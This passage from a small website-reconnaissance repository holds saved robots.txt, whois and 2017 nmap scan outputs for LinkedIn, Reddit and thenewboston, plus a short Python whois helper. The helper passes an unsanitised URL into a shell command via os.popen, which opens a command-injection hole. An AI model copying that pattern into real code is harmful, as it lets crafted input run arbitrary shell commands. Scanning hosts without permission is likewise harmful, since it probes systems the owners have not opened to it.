Disallow: /slink* 1671 | Disallow: /svpRecommendations* 1672 | Disallow: /uas/oauth/* 1673 | Disallow: /using* 1674 | Disallow: /help/*/ask 1675 | Disallow: /help/*/ask/* 1676 | Allow: /help/ 1677 | # Profinder only for deepcrawl 1678 | Allow: /profinder* 1679 | Allow: /profinder/* 1680 | Allow: /psettings/guest-controls* 1681 | Allow: /psettings/guest-email-unsubscribe* 1682 | Allow: /psettings/sms-unsubscribe* 1683 | Allow: /psettings/guest-controls/retargeting-opt-out* 1684 | 1685 | User-agent: * 1686 | Disallow: / 1687 | 1688 | # Notice: If you would like to crawl LinkedIn, 1689 | # please email whitelistcrawl@linkedin.com to apply 1690 | # for white listing. 1691 | -------------------------------------------------------------------------------- /Website-Scanner/websites/linkedin/whois.txt: -------------------------------------------------------------------------------- 1 | Domain Name: LINKEDIN.COM 2 | Registry Domain ID: 91818680_DOMAIN_COM-VRSN 3 | Registrar WHOIS Server: whois.markmonitor.com 4 | Registrar URL: http://www.markmonitor.com 5 | Updated Date: 2017-02-02T18:17:30Z 6 | Creation Date: 2002-11-02T15:38:11Z 7 | Registry Expiry Date: 2020-11-02T15:38:11Z 8 | Registrar: MarkMonitor Inc. 9 | Registrar IANA ID: 292 10 | Registrar Abuse Contact Email: abusecomplaints@markmonitor.com 11 | Registrar Abuse Contact Phone: +1.2083895740 12 | Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited 13 | Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited 14 | Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited 15 | Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited 16 | Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited 17 | Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited 18 | Name Server: DNS1.P09.NSONE.NET 19 | Name Server: DNS2.P09.NSONE.NET 20 | Name Server: DNS3.P09.NSONE.NET 21 | Name Server: DNS4.P09.NSONE.NET 22 | Name Server: NS1.P43.DYNECT.NET 23 | Name Server: NS2.P43.DYNECT.NET 24 | Name Server: NS3.P43.DYNECT.NET 25 | Name Server: NS4.P43.DYNECT.NET 26 | DNSSEC: unsigned 27 | URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 28 | >>> Last update of whois database: 2017-10-20T20:41:35Z <<< 29 | 30 | For more information on Whois status codes, please visit https://icann.org/epp 31 | 32 | NOTICE: The expiration date displayed in this record is the date the 33 | registrar's sponsorship of the domain name registration in the registry is 34 | currently set to expire. This date does not necessarily reflect the expiration 35 | date of the domain name registrant's agreement with the sponsoring 36 | registrar. Users may consult the sponsoring registrar's Whois database to 37 | view the registrar's reported date of expiration for this registration. 38 | 39 | TERMS OF USE: You are not authorized to access or query our Whois 40 | database through the use of electronic processes that are high-volume and 41 | automated except as reasonably necessary to register domain names or 42 | modify existing registrations; the Data in VeriSign Global Registry 43 | Services' ("VeriSign") Whois database is provided by VeriSign for 44 | information purposes only, and to assist persons in obtaining information 45 | about or related to a domain name registration record. VeriSign does not 46 | guarantee its accuracy. By submitting a Whois query, you agree to abide 47 | by the following terms of use: You agree that you may use this Data only 48 | for lawful purposes and that under no circumstances will you use this Data 49 | to: (1) allow, enable, or otherwise support the transmission of mass 50 | unsolicited, commercial advertising or solicitations via e-mail, telephone, 51 | or facsimile; or (2) enable high volume, automated, electronic processes 52 | that apply to VeriSign (or its computer systems). The compilation, 53 | repackaging, dissemination or other use of this Data is expressly 54 | prohibited without the prior written consent of VeriSign. You agree not to 55 | use electronic processes that are automated and high-volume to access or 56 | query the Whois database except as reasonably necessary to register 57 | domain names or modify existing registrations. VeriSign reserves the right 58 | to restrict your access to the Whois database in its sole discretion to ensure 59 | operational stability. VeriSign may restrict or terminate your access to the 60 | Whois database for failure to abide by these terms of use. VeriSign 61 | reserves the right to modify these terms at any time. 62 | 63 | The Registry database contains ONLY .COM, .NET, .EDU domains and 64 | Registrars. 65 | -------------------------------------------------------------------------------- /Website-Scanner/websites/reddit/domain-name.txt: -------------------------------------------------------------------------------- 1 | reddit.com -------------------------------------------------------------------------------- /Website-Scanner/websites/reddit/full-url.txt: -------------------------------------------------------------------------------- 1 | https://reddit.com -------------------------------------------------------------------------------- /Website-Scanner/websites/reddit/nmap.txt: -------------------------------------------------------------------------------- 1 | 2 | Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-21 02:11 IST 3 | Nmap scan report for 151.101.193.140 4 | Host is up (0.023s latency). 5 | Not shown: 99 filtered ports 6 | PORT STATE SERVICE 7 | 80/tcp open http 8 | 9 | Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds 10 | -------------------------------------------------------------------------------- /Website-Scanner/websites/reddit/robots-txt.txt: -------------------------------------------------------------------------------- 1 | 2 | # 80legs 3 | User-agent: 008 4 | Disallow: / 5 | 6 | # 80legs' new crawler 7 | User-agent: voltron 8 | Disallow: / 9 | 10 | User-Agent: bender 11 | Disallow: /my_shiny_metal_ass 12 | 13 | User-Agent: Gort 14 | Disallow: /earth 15 | 16 | User-agent: MJ12bot 17 | Disallow: / 18 | 19 | User-agent: PiplBot 20 | Disallow: / 21 | 22 | User-Agent: * 23 | Disallow: /*.json 24 | Disallow: /*.json-compact 25 | Disallow: /*.json-html 26 | Disallow: /*.xml 27 | Disallow: /*.rss 28 | Disallow: /*.i 29 | Disallow: /*.embed 30 | Disallow: /*/comments/*?*sort= 31 | Disallow: /r/*/comments/*/*/c* 32 | Disallow: /comments/*/*/c* 33 | Disallow: /r/*/submit 34 | Disallow: /message/compose* 35 | Disallow: /api 36 | Disallow: /post 37 | Disallow: /submit 38 | Disallow: /goto 39 | Disallow: /*after= 40 | Disallow: /*before= 41 | Disallow: /domain/*t= 42 | Disallow: /login 43 | Disallow: /reddits/search 44 | Disallow: /search 45 | Disallow: /r/*/search 46 | Disallow: /r/*/user/ 47 | Disallow: /gold? 48 | Allow: /partner_api/ 49 | Allow: / 50 | Allow: /sitemaps/*.xml 51 | 52 | Sitemap: https://www.reddit.com/sitemaps/subreddit-sitemaps.xml 53 | Sitemap: https://www.reddit.com/sitemaps/comment-page-sitemaps.xml 54 | -------------------------------------------------------------------------------- /Website-Scanner/websites/reddit/whois.txt: -------------------------------------------------------------------------------- 1 | Domain Name: REDDIT.COM 2 | Registry Domain ID: 153584275_DOMAIN_COM-VRSN 3 | Registrar WHOIS Server: whois.markmonitor.com 4 | Registrar URL: http://www.markmonitor.com 5 | Updated Date: 2017-07-12T19:18:12Z 6 | Creation Date: 2005-04-29T17:59:19Z 7 | Registry Expiry Date: 2020-04-29T17:59:19Z 8 | Registrar: MarkMonitor Inc. 9 | Registrar IANA ID: 292 10 | Registrar Abuse Contact Email: abusecomplaints@markmonitor.com 11 | Registrar Abuse Contact Phone: +1.2083895740 12 | Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited 13 | Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited 14 | Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited 15 | Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited 16 | Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited 17 | Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited 18 | Name Server: NS-1029.AWSDNS-00.ORG 19 | Name Server: NS-1887.AWSDNS-43.CO.UK 20 | Name Server: NS-378.AWSDNS-47.COM 21 | Name Server: NS-557.AWSDNS-05.NET 22 | DNSSEC: unsigned 23 | URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 24 | >>> Last update of whois database: 2017-10-20T20:41:35Z <<< 25 | 26 | For more information on Whois status codes, please visit https://icann.org/epp 27 | 28 | NOTICE: The expiration date displayed in this record is the date the 29 | registrar's sponsorship of the domain name registration in the registry is 30 | currently set to expire. This date does not necessarily reflect the expiration 31 | date of the domain name registrant's agreement with the sponsoring 32 | registrar. Users may consult the sponsoring registrar's Whois database to 33 | view the registrar's reported date of expiration for this registration. 34 | 35 | TERMS OF USE: You are not authorized to access or query our Whois 36 | database through the use of electronic processes that are high-volume and 37 | automated except as reasonably necessary to register domain names or 38 | modify existing registrations; the Data in VeriSign Global Registry 39 | Services' ("VeriSign") Whois database is provided by VeriSign for 40 | information purposes only, and to assist persons in obtaining information 41 | about or related to a domain name registration record. VeriSign does not 42 | guarantee its accuracy. By submitting a Whois query, you agree to abide 43 | by the following terms of use: You agree that you may use this Data only 44 | for lawful purposes and that under no circumstances will you use this Data 45 | to: (1) allow, enable, or otherwise support the transmission of mass 46 | unsolicited, commercial advertising or solicitations via e-mail, telephone, 47 | or facsimile; or (2) enable high volume, automated, electronic processes 48 | that apply to VeriSign (or its computer systems). The compilation, 49 | repackaging, dissemination or other use of this Data is expressly 50 | prohibited without the prior written consent of VeriSign. You agree not to 51 | use electronic processes that are automated and high-volume to access or 52 | query the Whois database except as reasonably necessary to register 53 | domain names or modify existing registrations. VeriSign reserves the right 54 | to restrict your access to the Whois database in its sole discretion to ensure 55 | operational stability. VeriSign may restrict or terminate your access to the 56 | Whois database for failure to abide by these terms of use. VeriSign 57 | reserves the right to modify these terms at any time. 58 | 59 | The Registry database contains ONLY .COM, .NET, .EDU domains and 60 | Registrars. 61 | -------------------------------------------------------------------------------- /Website-Scanner/websites/thenewboston/domain-name.txt: -------------------------------------------------------------------------------- 1 | thenewboston.com -------------------------------------------------------------------------------- /Website-Scanner/websites/thenewboston/full-url.txt: -------------------------------------------------------------------------------- 1 | https://www.thenewboston.com -------------------------------------------------------------------------------- /Website-Scanner/websites/thenewboston/nmap.txt: -------------------------------------------------------------------------------- 1 | 2 | Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-21 02:11 IST 3 | Nmap scan report for ec2-54-186-250-79.us-west-2.compute.amazonaws.com (54.186.250.79) 4 | Host is up (0.017s latency). 5 | Not shown: 99 filtered ports 6 | PORT STATE SERVICE 7 | 80/tcp open http 8 | 9 | Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds 10 | -------------------------------------------------------------------------------- /Website-Scanner/websites/thenewboston/robots-txt.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: /account.php 3 | Sitemap: https://thenewboston.com/sitemap/sitemap.xml -------------------------------------------------------------------------------- /Website-Scanner/websites/thenewboston/whois.txt: -------------------------------------------------------------------------------- 1 | Domain Name: THENEWBOSTON.COM 2 | Registry Domain ID: 1354853815_DOMAIN_COM-VRSN 3 | Registrar WHOIS Server: whois.gandi.net 4 | Registrar URL: http://www.gandi.net 5 | Updated Date: 2014-11-21T23:00:19Z 6 | Creation Date: 2007-12-14T05:25:32Z 7 | Registry Expiry Date: 2019-12-14T05:25:32Z 8 | Registrar: Gandi SAS 9 | Registrar IANA ID: 81 10 | Registrar Abuse Contact Email: abuse@support.gandi.net 11 | Registrar Abuse Contact Phone: +33.170377661 12 | Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited 13 | Name Server: NS-1248.AWSDNS-28.ORG 14 | Name Server: NS-1932.AWSDNS-49.CO.UK 15 | Name Server: NS-369.AWSDNS-46.COM 16 | Name Server: NS-598.AWSDNS-10.NET 17 | DNSSEC: unsigned 18 | URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 19 | >>> Last update of whois database: 2017-10-20T20:41:35Z <<< 20 | 21 | For more information on Whois status codes, please visit https://icann.org/epp 22 | 23 | NOTICE: The expiration date displayed in this record is the date the 24 | registrar's sponsorship of the domain name registration in the registry is 25 | currently set to expire. This date does not necessarily reflect the expiration 26 | date of the domain name registrant's agreement with the sponsoring 27 | registrar. Users may consult the sponsoring registrar's Whois database to 28 | view the registrar's reported date of expiration for this registration. 29 | 30 | TERMS OF USE: You are not authorized to access or query our Whois 31 | database through the use of electronic processes that are high-volume and 32 | automated except as reasonably necessary to register domain names or 33 | modify existing registrations; the Data in VeriSign Global Registry 34 | Services' ("VeriSign") Whois database is provided by VeriSign for 35 | information purposes only, and to assist persons in obtaining information 36 | about or related to a domain name registration record. VeriSign does not 37 | guarantee its accuracy. By submitting a Whois query, you agree to abide 38 | by the following terms of use: You agree that you may use this Data only 39 | for lawful purposes and that under no circumstances will you use this Data 40 | to: (1) allow, enable, or otherwise support the transmission of mass 41 | unsolicited, commercial advertising or solicitations via e-mail, telephone, 42 | or facsimile; or (2) enable high volume, automated, electronic processes 43 | that apply to VeriSign (or its computer systems). The compilation, 44 | repackaging, dissemination or other use of this Data is expressly 45 | prohibited without the prior written consent of VeriSign. You agree not to 46 | use electronic processes that are automated and high-volume to access or 47 | query the Whois database except as reasonably necessary to register 48 | domain names or modify existing registrations. VeriSign reserves the right 49 | to restrict your access to the Whois database in its sole discretion to ensure 50 | operational stability. VeriSign may restrict or terminate your access to the 51 | Whois database for failure to abide by these terms of use. VeriSign 52 | reserves the right to modify these terms at any time. 53 | 54 | The Registry database contains ONLY .COM, .NET, .EDU domains and 55 | Registrars. 56 | -------------------------------------------------------------------------------- /Website-Scanner/whois.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | def get_whois(url): 5 | command = 'whois ' + str(url) 6 | process = os.popen(command) 7 | result = str(process.read()) 8 | return result 9 | --------------------------------------------------------------------------------